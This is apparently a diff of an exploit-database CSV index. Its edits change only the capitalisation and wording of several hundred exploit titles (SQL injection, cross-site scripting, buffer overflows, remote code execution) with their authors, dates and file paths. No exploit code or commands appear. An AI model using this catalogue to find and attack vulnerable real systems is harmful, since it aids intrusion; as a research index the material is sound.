Scripting",2008-04-07,syniack,java,webapps,0 31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0 31623,platforms/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps,0 -31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote,0 +31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote,0 31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 31627,platforms/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 @@ -28527,10 +28528,10 @@ id,file,description,date,author,platform,type,port 31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 -31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 +31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31670,platforms/php/webapps/31670.txt,"Wordpress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Administrator Account Creation Cross-Site Request Forgery",2008-04-18,"Michael Brooks",php,webapps,0 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0 @@ -28560,9 +28561,9 @@ id,file,description,date,author,platform,type,port 31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0 31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service",2008-04-24,"Luigi Auriemma",windows,dos,0 -31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component mosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0 +31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0 31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0 -31710,platforms/novell/dos/31710.txt,"Novell GroupWise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0 +31710,platforms/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0 31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting",2008-04-28,"Khashayar Fereidani",php,webapps,0 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 @@ -28570,7 +28571,7 @@ id,file,description,date,author,platform,type,port 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 -31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk GuestBook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 +31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0 @@ -28586,10 +28587,10 @@ id,file,description,date,author,platform,type,port 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - (index.php cID parameter) SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - (index.php cID Parameter) SQL Injection",2014-02-18,killall-9,php,webapps,80 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,Metasploit,windows,remote,0 -31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 +31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -28606,20 +28607,20 @@ id,file,description,date,author,platform,type,port 31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Inclusion",2008-05-07,Matrix86,php,webapps,0 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate wgate.dll ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 -31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String Javascript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 +31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80 -31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 - UTF-7 HTTP Response Handling",2008-05-08,"Yaniv Miron",windows,remote,0 +31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2 - UTF-7 HTTP Response Handling",2008-05-08,"Yaniv Miron",windows,remote,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 -31761,platforms/linux/dos/31761.txt,"Embedthis Goahead Webserver 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 +31761,platforms/linux/dos/31761.txt,"Embedthis Goahead WebServer 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31766,platforms/windows/local/31766.rb,"Audiotran - '.pls' Stack Buffer Overflow",2014-02-19,Metasploit,windows,local,0 31767,platforms/multiple/remote/31767.rb,"MediaWiki - Thumb.php Remote Command Execution",2014-02-19,Metasploit,multiple,remote,80 -31768,platforms/php/webapps/31768.txt,"Wordpress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 +31768,platforms/php/webapps/31768.txt,"WordPress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote,0 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 @@ -28627,7 +28628,7 @@ id,file,description,date,author,platform,type,port 31773,platforms/php/webapps/31773.txt,"cPanel 11.x - scripts2/listaccts search Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-05-10,"David Sopas Ferreira",php,webapps,0 31775,platforms/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,php,webapps,0 -31776,platforms/php/webapps/31776.txt,"Wordpress WP Photo Album Plugin - 'photo' Parameter SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 +31776,platforms/php/webapps/31776.txt,"WordPress WP Photo Album Plugin - 'photo' Parameter SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 31777,platforms/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 31778,platforms/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php' Gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31779,platforms/php/webapps/31779.txt,"PHPInstantGallery 2.0 - image.php Multiple Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 @@ -28635,11 +28636,11 @@ id,file,description,date,author,platform,type,port 31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection",2008-05-12,SkyOut,php,webapps,0 31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31784,platforms/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 -31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 +31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution",2014-02-20,"Julien Ahrens",windows,remote,0 31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 @@ -28647,14 +28648,14 @@ id,file,description,date,author,platform,type,port 31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0 31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,php,webapps,0 31795,platforms/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,php,webapps,0 -31796,platforms/php/webapps/31796.txt,"Internet Photoshow - 'login_admin' Parameter Unauthorized Access",2008-05-14,t0pP8uZz,php,webapps,0 -31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 -31798,platforms/php/webapps/31798.txt,"Philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 -31799,platforms/php/webapps/31799.txt,"Philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 +31796,platforms/php/webapps/31796.txt,"Internet PhotoShow - 'login_admin' Parameter Unauthorized Access",2008-05-14,t0pP8uZz,php,webapps,0 +31797,platforms/asp/webapps/31797.txt,"philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 +31798,platforms/php/webapps/31798.txt,"philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 +31799,platforms/php/webapps/31799.txt,"philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - glossaire.php id Parameter Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 -31803,platforms/php/webapps/31803.txt,"AN GuestBook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 +31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps,0 31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' Parameter SQL Injection",2008-05-17,Lovebug,php,webapps,0 31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Inclusion",2008-05-19,Lostmon,php,webapps,0 @@ -28685,13 +28686,13 @@ id,file,description,date,author,platform,type,port 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",windows,remote,30000 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"WordPress AdRotate Plugin 3.9.4 - (clicktracker.php track Parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 -31836,platforms/php/webapps/31836.txt,"Wordpress Upload File Plugin - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 +31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 -31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 -31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 -31840,platforms/php/webapps/31840.txt,"Horde Multiple Product - day.php timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 +31840,platforms/php/webapps/31840.txt,"Horde Multiple Product - day.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0 31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection",2008-05-26,Jasbi,php,webapps,0 31843,platforms/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection",2008-05-26,Unohope,asp,webapps,0 @@ -28720,7 +28721,7 @@ id,file,description,date,author,platform,type,port 31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",php,webapps,0 31867,platforms/php/webapps/31867.php,"CMS Easyway - 'mid' Parameter SQL Injection",2008-05-30,Lidloses_Auge,php,webapps,0 31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' Parameter SQL Injection",2008-06-02,hadihadi,php,webapps,0 -31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps,0 +31869,platforms/asp/webapps/31869.txt,"i-pos StoreFront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps,0 31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component - 'forum' Parameter SQL Injection",2008-06-02,His0k4,php,webapps,0 31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection",2008-06-02,"Ugurcan Engyn",asp,webapps,0 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",multiple,dos,0 @@ -28740,7 +28741,7 @@ id,file,description,date,author,platform,type,port 31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 -31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 - Client Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 +31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 - Client Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps,0 @@ -28749,9 +28750,9 @@ id,file,description,date,author,platform,type,port 31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0 31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion",2014-02-25,Vulnerability-Lab,ios,webapps,8080 31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection",2014-02-25,Hurley,php,webapps,80 -31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - (.avs) Crash (PoC)",2014-02-25,kw4,windows,dos,0 +31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 -31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 +31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Parameter Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 @@ -28775,7 +28776,7 @@ id,file,description,date,author,platform,type,port 31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server resourceNode/jmsDestinationNew.jsf - Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server resourceNode/jmsConnectionNew.jsf - Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server resourceNode/jdbcResourceNew.jsf - Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server applications/lifecycleModulesNew.jsf - Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server Applications/lifecycleModulesNew.jsf - Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - resourceNode/jdbcConnectionPoolNew1.jsf Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 31929,platforms/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,php,webapps,0 31930,platforms/windows/local/31930.txt,"No-IP DUC Client for Windows - Local Information Disclosure",2008-06-16,"Charalambous Glafkos",windows,local,0 @@ -28785,15 +28786,15 @@ id,file,description,date,author,platform,type,port 31934,platforms/windows/dos/31934.txt,"Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption",2008-06-17,"Ivan Sanchez",windows,dos,0 31935,platforms/php/webapps/31935.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 -31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 -31938,platforms/php/webapps/31938.txt,"KEIL Software photokorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 +31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 +31938,platforms/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 -31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - AppleScript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 +31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,"AmnPardaz ",php,webapps,0 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 -31944,platforms/php/webapps/31944.txt,"PHPAuction - 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 +31944,platforms/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 